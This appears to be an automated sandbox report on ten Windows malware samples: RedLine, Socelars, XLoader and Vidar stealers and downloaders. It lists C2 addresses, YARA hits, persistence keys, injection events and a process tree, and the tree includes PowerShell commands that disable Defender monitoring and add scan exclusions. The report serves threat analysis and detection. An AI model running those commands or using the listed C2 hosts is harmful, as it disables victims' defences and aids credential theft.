Score: 10 (every task)
Tasks: static; 022e3c30a1...66.exe, 4d27dca0a1...ef.exe, 578a3a7a2b...b3.exe, 9c4880a98c...82.exe, a1dad4a83d...c4.exe, acf1b7d80f...e0.exe, cbf31d825a...d2.exe, db76a117db...12.exe, e2ffb8aeeb...f6.exe, f2196668f4...cb.exe, each run once on windows11_x64 and twice on windows10_x64
Resubmissions (score 10 each)
211110-r7nbvaeddr  10/11/2021, 14:50
211108-tnmmbahgaj  08/11/2021, 16:12
211108-svdsbaccf6  08/11/2021, 15:26
211108-r6lfvshdfn  08/11/2021, 14:48

Analysis
max time kernel: 1227s
max time network: 1250s
platform: windows11_x64
resource: win11
submitted: 08/11/2021, 16:12
Static task
static1

Behavioral tasks
task | Sample | Resource
behavioral1 | 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe | win11
behavioral2 | 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe | win10-en-20211014
behavioral3 | 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe | win10-de-20211014
behavioral4 | 4d27dca0a1e05e876c2a1a8c09854c847b8e21bc5db294ad63cbfc603b5d62ef.exe | win11
behavioral5 | 4d27dca0a1e05e876c2a1a8c09854c847b8e21bc5db294ad63cbfc603b5d62ef.exe | win10-en-20211014
behavioral6 | 4d27dca0a1e05e876c2a1a8c09854c847b8e21bc5db294ad63cbfc603b5d62ef.exe | win10-de-20211014
behavioral7 | 578a3a7a2b73a5c5f4a0485db0980b9acfa89b8e44690e799272d5cfb0237ab3.exe | win11
behavioral8 | 578a3a7a2b73a5c5f4a0485db0980b9acfa89b8e44690e799272d5cfb0237ab3.exe | win10-en-20211014
behavioral9 | 578a3a7a2b73a5c5f4a0485db0980b9acfa89b8e44690e799272d5cfb0237ab3.exe | win10-de-20211014
behavioral10 | 9c4880a98c53084391a2e2ec350515da63c1dc8ac929af17f012b690b0453782.exe | win11
behavioral11 | 9c4880a98c53084391a2e2ec350515da63c1dc8ac929af17f012b690b0453782.exe | win10-en-20211104
behavioral12 | 9c4880a98c53084391a2e2ec350515da63c1dc8ac929af17f012b690b0453782.exe | win10-de-20211014
behavioral13 | a1dad4a83d843acffbf293c0979951255abd9be4524d5a46c2fd48942a8a47c4.exe | win11
behavioral14 | a1dad4a83d843acffbf293c0979951255abd9be4524d5a46c2fd48942a8a47c4.exe | win10-en-20211014
behavioral15 | a1dad4a83d843acffbf293c0979951255abd9be4524d5a46c2fd48942a8a47c4.exe | win10-de-20211104
behavioral16 | acf1b7d80fc61269691cc9c7cb4884ffd5bbf5b1538c336c1007127d157738e0.exe | win11
behavioral17 | acf1b7d80fc61269691cc9c7cb4884ffd5bbf5b1538c336c1007127d157738e0.exe | win10-en-20211014
behavioral18 | acf1b7d80fc61269691cc9c7cb4884ffd5bbf5b1538c336c1007127d157738e0.exe | win10-de-20211104
behavioral19 | cbf31d825ac364f97420cb6523bca7bbcab24292e93fc9e946e64cb446291ad2.exe | win11
behavioral20 | cbf31d825ac364f97420cb6523bca7bbcab24292e93fc9e946e64cb446291ad2.exe | win10-en-20211104
behavioral21 | cbf31d825ac364f97420cb6523bca7bbcab24292e93fc9e946e64cb446291ad2.exe | win10-de-20211104
behavioral22 | db76a117dba6c24a64f328418c742a46b987d3b0914564ea439d468aa422aa12.exe | win11
behavioral23 | db76a117dba6c24a64f328418c742a46b987d3b0914564ea439d468aa422aa12.exe | win10-en-20211104
behavioral24 | db76a117dba6c24a64f328418c742a46b987d3b0914564ea439d468aa422aa12.exe | win10-de-20211104
behavioral25 | e2ffb8aeeb869fbb3de97b95b0c5c9cf2234d85612ba111115a938c89e4d94f6.exe | win11
behavioral26 | e2ffb8aeeb869fbb3de97b95b0c5c9cf2234d85612ba111115a938c89e4d94f6.exe | win10-en-20211104
behavioral27 | e2ffb8aeeb869fbb3de97b95b0c5c9cf2234d85612ba111115a938c89e4d94f6.exe | win10-de-20211104
behavioral28 | f2196668f412d730bc6bd24f08b749ed411d3450f9b4af846fc759e249f72acb.exe | win11
behavioral29 | f2196668f412d730bc6bd24f08b749ed411d3450f9b4af846fc759e249f72acb.exe | win10-en-20211104
behavioral30 | f2196668f412d730bc6bd24f08b749ed411d3450f9b4af846fc759e249f72acb.exe | win10-de-20211104
Malware Config

Extracted: socelars
http://www.iyiqian.com/
http://www.hbgents.top/
http://www.rsnzhy.com/
http://www.efxety.top/

Extracted: redline
Chris
194.104.136.5:46013

Extracted: redline
media18
91.121.67.60:2151

Extracted: xloader
2.5
s0iw
http://www.kyiejenner.com/s0iw/
Signatures

Process spawned unexpected child process (1 IoC)
This typically indicates the parent process was compromised via an exploit or macro.
description | pid | pid_target | Process | procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 2292 | 4884 | rundll32.exe | 19
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.

RedLine Payload (6 IoCs)
resource | yara_rule
behavioral4/memory/5560-332-0x0000000000400000-0x0000000000422000-memory.dmp | family_redline
behavioral4/memory/5580-359-0x0000000005240000-0x0000000005858000-memory.dmp | family_redline
behavioral4/memory/5580-327-0x0000000000400000-0x0000000000422000-memory.dmp | family_redline
behavioral4/memory/5560-326-0x0000000000000000-mapping.dmp | family_redline
behavioral4/memory/5580-325-0x0000000000000000-mapping.dmp | family_redline
behavioral4/memory/6116-370-0x0000000000000000-mapping.dmp | family_redline
Socelars Payload (2 IoCs)
resource | yara_rule
behavioral4/files/0x000100000002b1cb-205.dat | family_socelars
behavioral4/files/0x000100000002b1cb-235.dat | family_socelars
Suspicious use of NtCreateProcessExOtherParentProcess (9 IoCs)
description | pid | Process | procid_target
PID 840 created 1952 | 840 | WerFault.exe | 80
PID 5728 created 4648 | 5728 | WerFault.exe | 196
PID 1816 created 4828 | 1816 | WerFault.exe | 109
PID 4284 created 5232 | 4284 | WerFault.exe | 138
PID 5952 created 3552 | 5952 | WerFault.exe | 146
PID 3668 created 904 | 3668 | WerFault.exe | 142
PID 4336 created 468 | 4336 | WerFault.exe | 171
PID 5680 created 3104 | 5680 | WerFault.exe | 110
PID 2500 created 4896 | 2500 | WerFault.exe | 107
suricata: ET MALWARE FormBook CnC Checkin (GET)

suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin

suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2

Identifies VirtualBox via ACPI registry values (likely anti-VM) (2 TTPs)
Vidar Stealer (1 IoC)
resource | yara_rule
behavioral4/memory/904-478-0x0000000002230000-0x0000000002305000-memory.dmp | family_vidar

Xloader Payload (1 IoC)
resource | yara_rule
behavioral4/memory/5792-442-0x0000000002EC0000-0x0000000002EE9000-memory.dmp | xloader

resource | yara_rule
behavioral4/files/0x000300000002b1ab-157.dat | aspack_v212_v242
behavioral4/files/0x000100000002b1be-161.dat | aspack_v212_v242
behavioral4/files/0x000100000002b1be-159.dat | aspack_v212_v242
behavioral4/files/0x000300000002b1ab-156.dat | aspack_v212_v242
behavioral4/files/0x000100000002b1bc-155.dat | aspack_v212_v242
behavioral4/files/0x000100000002b1bc-154.dat | aspack_v212_v242
Adds policy Run key to start application (2 TTPs, 2 IoCs)
description | ioc | Process
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\WLKX0D0H5 = "C:\\Program Files (x86)\\Y8pyhfft\\lnz8vvkdnpkx.exe" | wlanext.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run | wlanext.exe

Blocklisted process makes network request (7 IoCs)
flow | pid | Process
30 | 4648 | cmd.exe
41 | 4648 | cmd.exe
46 | 4648 | cmd.exe
57 | 4648 | cmd.exe
59 | 4648 | cmd.exe
81 | 4648 | cmd.exe
92 | 4648 | cmd.exe

Downloads MZ/PE file

Executes dropped EXE (42 IoCs)
pid | Process
1344 | setup_installer.exe
1952 | setup_install.exe
2952 | Tue192762f1cd058ddf8.exe
5056 | Tue19879c4c0e.exe
3988 | Tue19761b3b8d9d.exe
3304 | Tue19411ac950924ec3f.exe
4948 | Tue195c40958f528163.exe
4840 | Tue19325eb008c0b950.exe
4828 | Tue19c06f159e0ec.exe
4648 | Tue19b4ef3b53293fe.exe
3316 | Tue193858933525b62.exe
4896 | Tue19c1338f41ab.exe
2520 | Tue19f51bcd77a.exe
3104 | Tue19150ee2be694c8a4.exe
3812 | Tue1969586bcbf58493.exe
4452 | Tue1993b3f72c.exe
3332 | Tue19c78ded4d176ac.exe
3852 | Tue19879c4c0e.tmp
5188 | Tue19879c4c0e.exe
5404 | Tue19879c4c0e.tmp
5684 | hz2zZEE1IO8UL8KkUIl_DiwJ.exe
5740 | 8274515.exe
5552 | Tue19f51bcd77a.exe
5580 | Tue195c40958f528163.exe
5560 | Tue19761b3b8d9d.exe
6012 | ~Xy1GPomKV09sC.Exe
5832 | Tue19f51bcd77a.exe
2052 | 4775154.exe
440 | bogAMCgr_ceyHDpTDqaFFCso.exe
5232 | lmuaIti549S4IlfLGjOQ62Vi.exe
6116 | Tue19f51bcd77a.exe
4684 | OXLD9voH55f6gEm9L6axlvDX.exe
904 | PzZpKoEf4kqLrhhG_T7hkMOE.exe
5384 | dKb7nc_82MUnYJcIwvnENgPK.exe
3552 | Xhhrp4rIfn8tBtFfUngVP_kE.exe
2288 | 6218320.exe
5948 | control.exe
5960 | 435056.exe
3504 | 8581712.exe
1540 | RxAPuFNW.exe
4832 | WinHoster.exe
2564 | lnz8vvkdnpkx.exe

Sets service image path in registry (2 TTPs)
Checks BIOS information in registry (2 TTPs, 6 IoCs)
BIOS information is often read in order to detect sandboxing environments.
description | ioc | Process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | 4775154.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | 4775154.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | OXLD9voH55f6gEm9L6axlvDX.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | OXLD9voH55f6gEm9L6axlvDX.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | 6218320.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | 6218320.exe

Loads dropped DLL (13 IoCs)
pid | Process
1952 | setup_install.exe
1952 | setup_install.exe
1952 | setup_install.exe
1952 | setup_install.exe
1952 | setup_install.exe
3852 | Tue19879c4c0e.tmp
5404 | Tue19879c4c0e.tmp
468 | rundll32.exe
4700 | msiexec.exe
4700 | msiexec.exe
6000 | rundll32.exe
6000 | rundll32.exe
3572 | rundll32.exe
Reads user/profile data of web browsers (2 TTPs)
Infostealers often target stored browser data, which can include saved credentials etc.

Accesses cryptocurrency files/wallets, possible credential harvesting (2 TTPs)

Adds Run key to start application (2 TTPs, 1 IoC)
description | ioc | Process
Set value (str) | \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe" | 435056.exe

Checks installed software on the system (1 TTP)
Looks up Uninstall key entries in the registry to enumerate software on the system.

description | ioc | Process
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | 6218320.exe
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | 4775154.exe
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | OXLD9voH55f6gEm9L6axlvDX.exe

Legitimate hosting services abused for malware hosting/C2 (1 TTP)

Looks up external IP address via web service (4 IoCs)
Uses a legitimate IP lookup service to find the infected system's external IP.
flow | ioc
1 | ip-api.com
4 | ipinfo.io
37 | ipinfo.io
105 | ipinfo.io
Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.

Suspicious use of NtSetInformationThreadHideFromDebugger (3 IoCs)
pid | Process
2052 | 4775154.exe
4684 | OXLD9voH55f6gEm9L6axlvDX.exe
2288 | 6218320.exe

Suspicious use of SetThreadContext (5 IoCs)
description | pid | Process | procid_target
PID 4948 set thread context of 5580 | 4948 | Tue195c40958f528163.exe | 127
PID 3988 set thread context of 5560 | 3988 | Tue19761b3b8d9d.exe | 128
PID 2520 set thread context of 6116 | 2520 | Tue19f51bcd77a.exe | 135
PID 440 set thread context of 3220 | 440 | bogAMCgr_ceyHDpTDqaFFCso.exe | 29
PID 5792 set thread context of 3220 | 5792 | wlanext.exe | 29

Drops file in Program Files directory (6 IoCs)
description | ioc | Process
File opened for modification | C:\Program Files (x86)\Y8pyhfft\lnz8vvkdnpkx.exe | Explorer.EXE
File created | C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe | dKb7nc_82MUnYJcIwvnENgPK.exe
File opened for modification | C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe | dKb7nc_82MUnYJcIwvnENgPK.exe
File opened for modification | C:\Program Files (x86)\Y8pyhfft\lnz8vvkdnpkx.exe | wlanext.exe
File opened for modification | C:\Program Files (x86)\Y8pyhfft | Explorer.EXE
File created | C:\Program Files (x86)\Y8pyhfft\lnz8vvkdnpkx.exe | Explorer.EXE

Drops file in Windows directory (6 IoCs)
description | ioc | Process
File opened for modification | C:\Windows\SoftwareDistribution\DataStore\Logs\edb.log | svchost.exe
File opened for modification | C:\Windows\SoftwareDistribution\DataStore\DataStore.edb | svchost.exe
File opened for modification | C:\Windows\SoftwareDistribution\DataStore\DataStore.jfm | svchost.exe
File opened for modification | C:\Windows\SoftwareDistribution\ReportingEvents.log | svchost.exe
File opened for modification | C:\Windows\WindowsUpdate.log | svchost.exe
File opened for modification | C:\Windows\SoftwareDistribution\DataStore\Logs\edb.chk | svchost.exe

Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

Program crash (7 IoCs)
pid | pid_target | Process | procid_target
5156 | 1952 | WerFault.exe | 80
3236 | 4648 | WerFault.exe | 102
2264 | 4828 | WerFault.exe | 109
6028 | 3552 | WerFault.exe | 146
5648 | 5232 | WerFault.exe | 138
416 | 3104 | WerFault.exe | 110
3448 | 4896 | WerFault.exe | 107
Checks processor information in registry (2 TTPs, 51 IoCs)
Processor information is often read in order to detect sandboxing environments.
Creates scheduled task(s) (1 TTP, 2 IoCs)
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid | Process
4508 | schtasks.exe
2620 | schtasks.exe

Enumerates system info in registry (2 TTPs, 14 IoCs)
description | ioc | Process
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WerFault.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WerFault.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WerFault.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WerFault.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WerFault.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WerFault.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WerFault.exe
Kills process with taskkill (2 IoCs)
pid | Process
6060 | taskkill.exe
5224 | taskkill.exe

description | ioc | Process
Key created | \Registry\User\S-1-5-21-257790753-2419383948-818201544-1000\SOFTWARE\Microsoft\Internet Explorer\IntelliForms\Storage2 | wlanext.exe

Modifies data under HKEY_USERS (64 IoCs)
Modifies registry class (1 IoC)
description | ioc | Process
Key created | \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ | Explorer.EXE

Suspicious behavior: EnumeratesProcesses (64 IoCs)
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 3220 Explorer.EXE -
Suspicious behavior: MapViewOfSection 5 IoCs
pid Process 440 bogAMCgr_ceyHDpTDqaFFCso.exe 440 bogAMCgr_ceyHDpTDqaFFCso.exe 440 bogAMCgr_ceyHDpTDqaFFCso.exe 5792 wlanext.exe 5792 wlanext.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeCreateTokenPrivilege 4648 Tue19b4ef3b53293fe.exe Token: SeAssignPrimaryTokenPrivilege 4648 Tue19b4ef3b53293fe.exe Token: SeLockMemoryPrivilege 4648 Tue19b4ef3b53293fe.exe Token: SeIncreaseQuotaPrivilege 4648 Tue19b4ef3b53293fe.exe Token: SeMachineAccountPrivilege 4648 Tue19b4ef3b53293fe.exe Token: SeTcbPrivilege 4648 Tue19b4ef3b53293fe.exe Token: SeSecurityPrivilege 4648 Tue19b4ef3b53293fe.exe Token: SeTakeOwnershipPrivilege 4648 Tue19b4ef3b53293fe.exe Token: SeLoadDriverPrivilege 4648 Tue19b4ef3b53293fe.exe Token: SeSystemProfilePrivilege 4648 Tue19b4ef3b53293fe.exe Token: SeSystemtimePrivilege 4648 Tue19b4ef3b53293fe.exe Token: SeProfSingleProcessPrivilege 4648 Tue19b4ef3b53293fe.exe Token: SeIncBasePriorityPrivilege 4648 Tue19b4ef3b53293fe.exe Token: SeCreatePagefilePrivilege 4648 Tue19b4ef3b53293fe.exe Token: SeCreatePermanentPrivilege 4648 Tue19b4ef3b53293fe.exe Token: SeBackupPrivilege 4648 Tue19b4ef3b53293fe.exe Token: SeRestorePrivilege 4648 Tue19b4ef3b53293fe.exe Token: SeShutdownPrivilege 4648 Tue19b4ef3b53293fe.exe Token: SeDebugPrivilege 4648 Tue19b4ef3b53293fe.exe Token: SeAuditPrivilege 4648 Tue19b4ef3b53293fe.exe Token: SeSystemEnvironmentPrivilege 4648 Tue19b4ef3b53293fe.exe Token: SeChangeNotifyPrivilege 4648 Tue19b4ef3b53293fe.exe Token: SeRemoteShutdownPrivilege 4648 Tue19b4ef3b53293fe.exe Token: SeUndockPrivilege 4648 Tue19b4ef3b53293fe.exe Token: SeSyncAgentPrivilege 4648 Tue19b4ef3b53293fe.exe Token: SeEnableDelegationPrivilege 4648 Tue19b4ef3b53293fe.exe Token: SeManageVolumePrivilege 4648 Tue19b4ef3b53293fe.exe Token: SeImpersonatePrivilege 4648 Tue19b4ef3b53293fe.exe Token: SeCreateGlobalPrivilege 4648 Tue19b4ef3b53293fe.exe Token: 31 4648 Tue19b4ef3b53293fe.exe Token: 32 4648 Tue19b4ef3b53293fe.exe Token: 33 4648 Tue19b4ef3b53293fe.exe Token: 34 4648 Tue19b4ef3b53293fe.exe Token: 35 4648 Tue19b4ef3b53293fe.exe Token: SeDebugPrivilege 2660 powershell.exe Token: SeDebugPrivilege 2924 powershell.exe Token: 
SeDebugPrivilege 3332 Tue19c78ded4d176ac.exe Token: SeDebugPrivilege 3304 Tue19411ac950924ec3f.exe Token: SeRestorePrivilege 5156 WerFault.exe Token: SeBackupPrivilege 5156 WerFault.exe Token: SeDebugPrivilege 6060 taskkill.exe Token: SeDebugPrivilege 440 bogAMCgr_ceyHDpTDqaFFCso.exe Token: SeShutdownPrivilege 3220 Explorer.EXE Token: SeCreatePagefilePrivilege 3220 Explorer.EXE Token: SeShutdownPrivilege 3220 Explorer.EXE Token: SeCreatePagefilePrivilege 3220 Explorer.EXE Token: SeShutdownPrivilege 3220 Explorer.EXE Token: SeCreatePagefilePrivilege 3220 Explorer.EXE Token: SeShutdownPrivilege 3220 Explorer.EXE Token: SeCreatePagefilePrivilege 3220 Explorer.EXE Token: SeDebugPrivilege 5740 8274515.exe Token: SeDebugPrivilege 5792 wlanext.exe Token: SeShutdownPrivilege 3220 Explorer.EXE Token: SeCreatePagefilePrivilege 3220 Explorer.EXE Token: SeDebugPrivilege 5224 taskkill.exe Token: SeShutdownPrivilege 3220 Explorer.EXE Token: SeCreatePagefilePrivilege 3220 Explorer.EXE Token: SeShutdownPrivilege 3220 Explorer.EXE Token: SeCreatePagefilePrivilege 3220 Explorer.EXE Token: SeShutdownPrivilege 3220 Explorer.EXE Token: SeCreatePagefilePrivilege 3220 Explorer.EXE Token: SeShutdownPrivilege 3220 Explorer.EXE Token: SeCreatePagefilePrivilege 3220 Explorer.EXE Token: SeShutdownPrivilege 3220 Explorer.EXE -
Suspicious use of UnmapMainImage 1 IoCs
pid Process 3220 Explorer.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1800 wrote to memory of 1344 1800 4d27dca0a1e05e876c2a1a8c09854c847b8e21bc5db294ad63cbfc603b5d62ef.exe 79 PID 1800 wrote to memory of 1344 1800 4d27dca0a1e05e876c2a1a8c09854c847b8e21bc5db294ad63cbfc603b5d62ef.exe 79 PID 1800 wrote to memory of 1344 1800 4d27dca0a1e05e876c2a1a8c09854c847b8e21bc5db294ad63cbfc603b5d62ef.exe 79 PID 1344 wrote to memory of 1952 1344 setup_installer.exe 80 PID 1344 wrote to memory of 1952 1344 setup_installer.exe 80 PID 1344 wrote to memory of 1952 1344 setup_installer.exe 80 PID 1952 wrote to memory of 4432 1952 setup_install.exe 84 PID 1952 wrote to memory of 4432 1952 setup_install.exe 84 PID 1952 wrote to memory of 4432 1952 setup_install.exe 84 PID 1952 wrote to memory of 2180 1952 setup_install.exe 85 PID 1952 wrote to memory of 2180 1952 setup_install.exe 85 PID 1952 wrote to memory of 2180 1952 setup_install.exe 85 PID 4432 wrote to memory of 2924 4432 cmd.exe 86 PID 4432 wrote to memory of 2924 4432 cmd.exe 86 PID 4432 wrote to memory of 2924 4432 cmd.exe 86 PID 2180 wrote to memory of 2660 2180 cmd.exe 87 PID 2180 wrote to memory of 2660 2180 cmd.exe 87 PID 2180 wrote to memory of 2660 2180 cmd.exe 87 PID 1952 wrote to memory of 2620 1952 setup_install.exe 88 PID 1952 wrote to memory of 2620 1952 setup_install.exe 88 PID 1952 wrote to memory of 2620 1952 setup_install.exe 88 PID 1952 wrote to memory of 4188 1952 setup_install.exe 117 PID 1952 wrote to memory of 4188 1952 setup_install.exe 117 PID 1952 wrote to memory of 4188 1952 setup_install.exe 117 PID 1952 wrote to memory of 4508 1952 setup_install.exe 89 PID 1952 wrote to memory of 4508 1952 setup_install.exe 89 PID 1952 wrote to memory of 4508 1952 setup_install.exe 89 PID 1952 wrote to memory of 3784 1952 setup_install.exe 90 PID 1952 wrote to memory of 3784 1952 setup_install.exe 90 PID 1952 wrote to memory of 3784 1952 setup_install.exe 90 PID 1952 wrote to memory of 4892 1952 setup_install.exe 91 PID 1952 wrote to memory of 
4892 1952 setup_install.exe 91 PID 1952 wrote to memory of 4892 1952 setup_install.exe 91 PID 1952 wrote to memory of 3088 1952 setup_install.exe 92 PID 1952 wrote to memory of 3088 1952 setup_install.exe 92 PID 1952 wrote to memory of 3088 1952 setup_install.exe 92 PID 1952 wrote to memory of 3668 1952 setup_install.exe 101 PID 1952 wrote to memory of 3668 1952 setup_install.exe 101 PID 1952 wrote to memory of 3668 1952 setup_install.exe 101 PID 1952 wrote to memory of 3416 1952 setup_install.exe 93 PID 1952 wrote to memory of 3416 1952 setup_install.exe 93 PID 1952 wrote to memory of 3416 1952 setup_install.exe 93 PID 1952 wrote to memory of 3704 1952 setup_install.exe 100 PID 1952 wrote to memory of 3704 1952 setup_install.exe 100 PID 1952 wrote to memory of 3704 1952 setup_install.exe 100 PID 1952 wrote to memory of 4016 1952 setup_install.exe 99 PID 1952 wrote to memory of 4016 1952 setup_install.exe 99 PID 1952 wrote to memory of 4016 1952 setup_install.exe 99 PID 1952 wrote to memory of 3484 1952 setup_install.exe 98 PID 1952 wrote to memory of 3484 1952 setup_install.exe 98 PID 1952 wrote to memory of 3484 1952 setup_install.exe 98 PID 1952 wrote to memory of 5076 1952 setup_install.exe 97 PID 1952 wrote to memory of 5076 1952 setup_install.exe 97 PID 1952 wrote to memory of 5076 1952 setup_install.exe 97 PID 1952 wrote to memory of 2216 1952 setup_install.exe 96 PID 1952 wrote to memory of 2216 1952 setup_install.exe 96 PID 1952 wrote to memory of 2216 1952 setup_install.exe 96 PID 1952 wrote to memory of 1564 1952 setup_install.exe 94 PID 1952 wrote to memory of 1564 1952 setup_install.exe 94 PID 1952 wrote to memory of 1564 1952 setup_install.exe 94 PID 1952 wrote to memory of 3184 1952 setup_install.exe 95 PID 1952 wrote to memory of 3184 1952 setup_install.exe 95 PID 1952 wrote to memory of 3184 1952 setup_install.exe 95 PID 2620 wrote to memory of 5056 2620 cmd.exe 114
Processes
(Each entry gives the process tree depth, the image path, the command line, the behaviours flagged for the process and its PID.)

Level 1: C:\Windows\Explorer.EXE
  Command line: C:\Windows\Explorer.EXE
  - Drops file in Program Files directory
  - Modifies registry class
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of UnmapMainImage
  PID: 3220

Level 2: C:\Users\Admin\AppData\Local\Temp\4d27dca0a1e05e876c2a1a8c09854c847b8e21bc5db294ad63cbfc603b5d62ef.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\4d27dca0a1e05e876c2a1a8c09854c847b8e21bc5db294ad63cbfc603b5d62ef.exe"
  - Suspicious use of WriteProcessMemory
  PID: 1800

Level 3: C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID: 1344

Level 4: C:\Users\Admin\AppData\Local\Temp\7zS0450EC84\setup_install.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\7zS0450EC84\setup_install.exe"
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID: 1952

Level 5: C:\Windows\SysWOW64\cmd.exe
  Command line: C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true
  - Suspicious use of WriteProcessMemory
  PID: 4432

Level 6: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  Command line: powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID: 2924

Level 5: C:\Windows\SysWOW64\cmd.exe
  Command line: C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
  - Suspicious use of WriteProcessMemory
  PID: 2180

Level 6: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  Command line: powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID: 2660

Level 5: C:\Windows\SysWOW64\cmd.exe
  Command line: C:\Windows\system32\cmd.exe /c Tue19879c4c0e.exe
  - Suspicious use of WriteProcessMemory
  PID: 2620

Level 6: C:\Users\Admin\AppData\Local\Temp\7zS0450EC84\Tue19879c4c0e.exe
  Command line: Tue19879c4c0e.exe
  - Executes dropped EXE
  PID: 5056

Level 7: C:\Users\Admin\AppData\Local\Temp\is-9T9QM.tmp\Tue19879c4c0e.tmp
  Command line: "C:\Users\Admin\AppData\Local\Temp\is-9T9QM.tmp\Tue19879c4c0e.tmp" /SL5="$20160,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS0450EC84\Tue19879c4c0e.exe"
  - Executes dropped EXE
  - Loads dropped DLL
  PID: 3852

Level 8: C:\Users\Admin\AppData\Local\Temp\7zS0450EC84\Tue19879c4c0e.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\7zS0450EC84\Tue19879c4c0e.exe" /SILENT
  - Executes dropped EXE
  PID: 5188

Level 9: C:\Users\Admin\AppData\Local\Temp\is-ATMRQ.tmp\Tue19879c4c0e.tmp
  Command line: "C:\Users\Admin\AppData\Local\Temp\is-ATMRQ.tmp\Tue19879c4c0e.tmp" /SL5="$2021E,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS0450EC84\Tue19879c4c0e.exe" /SILENT
  - Executes dropped EXE
  - Loads dropped DLL
  PID: 5404

Level 5: C:\Windows\SysWOW64\cmd.exe
  Command line: C:\Windows\system32\cmd.exe /c Tue195c40958f528163.exe
  PID: 4508

Level 6: C:\Users\Admin\AppData\Local\Temp\7zS0450EC84\Tue195c40958f528163.exe
  Command line: Tue195c40958f528163.exe
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID: 4948

Level 7: C:\Users\Admin\AppData\Local\Temp\7zS0450EC84\Tue195c40958f528163.exe
